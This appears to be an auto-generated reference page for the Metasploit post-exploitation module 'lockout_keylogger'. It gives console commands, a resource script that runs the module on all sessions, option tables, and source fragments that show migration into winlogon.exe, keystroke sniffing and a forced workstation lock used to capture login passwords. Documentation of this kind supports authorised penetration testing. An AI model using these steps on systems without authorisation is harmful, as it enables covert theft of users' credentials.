Windows Capture Winlogon Lockout Credential Keylogger - Metasploit


This page contains detailed information about how to use the post/windows/capture/lockout_keylogger Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Capture Winlogon Lockout Credential Keylogger
Module: post/windows/capture/lockout_keylogger
Source code: modules/post/windows/capture/lockout_keylogger.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module migrates and logs Microsoft Windows user's passwords via Winlogon.exe using idle time and natural system changes to give a false sense of security to the user.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/capture/lockout_keylogger

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/capture/lockout_keylogger
msf post(lockout_keylogger) > show options
    ... show and set options ...
msf post(lockout_keylogger) > set SESSION session-id
msf post(lockout_keylogger) > exploit

If you wish to run the post module against all sessions from the framework, here is how:

1 - Create the following resource script:


<ruby>
# Embedded Ruby in a resource script must be wrapped in <ruby> ... </ruby> tags,
# otherwise msfconsole treats each line as a console command.
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/capture/lockout_keylogger")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.


Msfconsole Usage


Here is how the windows/capture/lockout_keylogger post exploitation module looks in the msfconsole:

msf6 > use post/windows/capture/lockout_keylogger

msf6 post(windows/capture/lockout_keylogger) > show info

       Name: Windows Capture Winlogon Lockout Credential Keylogger
     Module: post/windows/capture/lockout_keylogger
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  mubix <[email protected]>
  cg

Compatible session types:
  Meterpreter

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HEARTBEAT  30               yes       Heart beat between idle checks
  INTERVAL   30               yes       Time between key collection during logging
  LOCKTIME   300              yes       Amount of idle time before lockout
  PID                         no        Target PID, only needed if multiple winlogon.exe instances exist
  SESSION                     yes       The session to run this module on.
  WAIT       false            yes       Wait for lockout instead of default method

Description:
  This module migrates and logs Microsoft Windows user's passwords via 
  Winlogon.exe using idle time and natural system changes to give a 
  false sense of security to the user.

References:
  http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

Module Options


This is a complete list of options available in the windows/capture/lockout_keylogger post exploitation module:

msf6 post(windows/capture/lockout_keylogger) > show options

Module options (post/windows/capture/lockout_keylogger):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HEARTBEAT  30               yes       Heart beat between idle checks
   INTERVAL   30               yes       Time between key collection during logging
   LOCKTIME   300              yes       Amount of idle time before lockout
   PID                         no        Target PID, only needed if multiple winlogon.exe instances exist
   SESSION                     yes       The session to run this module on.
   WAIT       false            yes       Wait for lockout instead of default method

Advanced Options


Here is a complete list of advanced options supported by the windows/capture/lockout_keylogger post exploitation module:

msf6 post(windows/capture/lockout_keylogger) > show advanced

Module advanced options (post/windows/capture/lockout_keylogger):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/capture/lockout_keylogger module can do:

msf6 post(windows/capture/lockout_keylogger) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/capture/lockout_keylogger post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/capture/lockout_keylogger) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Winlogon not found! Exiting


Here is a relevant code snippet related to the "Winlogon not found! Exiting" error message:

46:	      if x['name'].downcase == "winlogon.exe"
47:	        winlogon << x
48:	      end
49:	    end
50:	    if winlogon.size == 0
51:	      print_status("Winlogon not found! Exiting")
52:	      return 'exit'
53:	    elsif winlogon.size == 1
54:	      return winlogon[0]['pid']
55:	    else
56:	      print_error("Multiple WINLOGON processes found, run manually and specify pid")

Multiple WINLOGON processes found, run manually and specify pid


Here is a relevant code snippet related to the "Multiple WINLOGON processes found, run manually and specify pid" error message:

51:	      print_status("Winlogon not found! Exiting")
52:	      return 'exit'
53:	    elsif winlogon.size == 1
54:	      return winlogon[0]['pid']
55:	    else
56:	      print_error("Multiple WINLOGON processes found, run manually and specify pid")
57:	      print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
58:	      winlogon.each do |tp|
59:	        print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
60:	      end
61:	      return 'exit'

Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session


Here is a relevant code snippet related to the "Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session" error message:

52:	      return 'exit'
53:	    elsif winlogon.size == 1
54:	      return winlogon[0]['pid']
55:	    else
56:	      print_error("Multiple WINLOGON processes found, run manually and specify pid")
57:	      print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
58:	      winlogon.each do |tp|
59:	        print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
60:	      end
61:	      return 'exit'
62:	    end

Failed to start Keylogging!


Here is a relevant code snippet related to the "Failed to start Keylogging!" error message:

67:	    begin
68:	      print_status("Starting the keystroke sniffer...")
69:	      session.ui.keyscan_start
70:	      return true
71:	    rescue
72:	      print_error("Failed to start Keylogging!")
73:	      return false
74:	    end
75:	  end
76:	
77:	  # Function for Collecting Capture (pulled from Carlos Perez's Keylogrecorder)

This module does not support this platform.


Here is a relevant code snippet related to the "This module does not support this platform." error message:

151:	    ::FileUtils.mkdir_p(logs)	# Create the log directory
152:	    logfile = logs + ::File::Separator + host + filenameinfo + ".txt"	# Logfile name
153:	
154:	    # Make sure we are on a Windows host
155:	    if client.platform != 'windows'
156:	      print_error('This module does not support this platform.')
157:	      return
158:	    end
159:	
160:	    # Check admin status
161:	    admin = check_admin

Must be an admin to migrate into Winlogon.exe, exiting


Here is a relevant code snippet related to the "Must be an admin to migrate into Winlogon.exe, exiting" error message:

158:	    end
159:	
160:	    # Check admin status
161:	    admin = check_admin
162:	    if admin == false
163:	      print_error("Must be an admin to migrate into Winlogon.exe, exiting")
164:	      return
165:	    end
166:	
167:	    mypid = session.sys.process.getpid
168:	    if datastore['PID'] == 0

Already in WINLOGON no need to migrate


Here is a relevant code snippet related to the "Already in WINLOGON no need to migrate" error message:

176:	      targetpid = datastore['PID']
177:	      print_status("WINLOGON PID:#{targetpid} specified. I'm trusting you...")
178:	    end
179:	
180:	    if mypid == targetpid
181:	      print_status("Already in WINLOGON no need to migrate")
182:	    else
183:	      print_status("Migrating from PID:#{mypid}")
184:	      begin
185:	        session.core.migrate(targetpid)
186:	      rescue

Unable to migrate, try getsystem first


Here is a relevant code snippet related to the "Unable to migrate, try getsystem first" error message:

182:	    else
183:	      print_status("Migrating from PID:#{mypid}")
184:	      begin
185:	        session.core.migrate(targetpid)
186:	      rescue
187:	        print_error("Unable to migrate, try getsystem first")
188:	        return
189:	      end
190:	      print_good("Migrated to WINLOGON PID: #{targetpid} successfully")
191:	    end
192:	

Locking the workstation falied, trying again..


Here is a relevant code snippet related to the "Locking the workstation falied, trying again.." error message:

222:	        select(nil, nil, nil, datastore['HEARTBEAT'])
223:	        currentidle = session.ui.idle_time
224:	      end
225:	      client.railgun.user32.LockWorkStation()
226:	      if client.railgun.user32.GetForegroundWindow()['return'] == 0
227:	        print_error("Locking the workstation falied, trying again..")
228:	        client.railgun.user32.LockWorkStation()
229:	        if client.railgun.user32.GetForegroundWindow()['return'] == 0
230:	          print_error("The system will not lock this session, nor will it be used for user login, exiting...")
231:	          return
232:	        else

The system will not lock this session, nor will it be used for user login, exiting...


Here is a relevant code snippet related to the "The system will not lock this session, nor will it be used for user login, exiting..." error message:

225:	      client.railgun.user32.LockWorkStation()
226:	      if client.railgun.user32.GetForegroundWindow()['return'] == 0
227:	        print_error("Locking the workstation falied, trying again..")
228:	        client.railgun.user32.LockWorkStation()
229:	        if client.railgun.user32.GetForegroundWindow()['return'] == 0
230:	          print_error("The system will not lock this session, nor will it be used for user login, exiting...")
231:	          return
232:	        else
233:	          print_status("Locked this time, time to start keyloggin...")
234:	        end
235:	      end




Authors


  • mubix
  • cg

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
